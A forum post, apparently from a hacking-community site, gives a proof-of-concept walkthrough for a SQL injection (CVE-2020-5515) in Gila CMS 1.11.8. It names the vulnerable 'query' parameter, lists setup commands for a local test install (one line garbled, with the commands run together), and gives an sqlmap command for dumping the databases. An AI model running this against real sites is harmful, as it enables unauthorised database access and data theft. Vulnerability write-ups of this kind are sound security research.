• We just launched and are currently in beta. Join us as we build and grow the community.

Exploit Gila CMS 1.11.8 – ‘query’ SQL Injection (PoC)

dejimason

Smart Wallet Architect
D
D Rep
0
0
0
Rep
0
D Vouches
0
0
0
Vouches
0
Posts
156
Likes
173
Bits
0
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 400 XP
CVE-2020-5515.png


Hey folks, today we will show you (PoC) of “Gila CMS 1.11.8 – ‘query’ SQL Injection” vulnerability. The get parameter “query” is vulnerable, hence we will use the SQL injection tool 💉 to retrieve the database.

About the Vulnerability
  • Exploit Author: Carlos Ramírez L. (BillyV4)
  • Vendor Homepage: https://gilacms.com/
  • Version: Gila 1.11.8
  • CVE : CVE-2020-5515

Vulnerability Setup
wget https://github.com/GilaCMS/gila/archive/1.11.8.zip
unzip gila-1.11.8.zip
mkdir gila /var/www/html/
cp -R gila-1.11.8/* /var/www/html/gila/
cp gila-1.11.8/.htaccess /var/www/html/gila/
chown -R www-data:www-data gila/123456wget https://github.com/GilaCMS/gila/archive/1.11.8.zipunzip gila-1.11.8.zipmkdir gila/var/www/html/cp-Rgila-1.11.8/*/var/www/html/gila/cp gila-1.11.8/.htaccess/var/www/html/gila/chown-Rwww-data:www-data gila/

1-14.png

Full Proof of Concept

Step -1

burp.png


Step -2

Usage 🙂 < sqlmap > -r <burpsuite capture file > –dbs –level=5 –risk=3

sqlcommand.png


Step -3

result.png
About the AuthorShubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Conact on Linkedin.
 
You must log in or register to reply here.

428,602

311,185

311,194

A AymaneM4
Top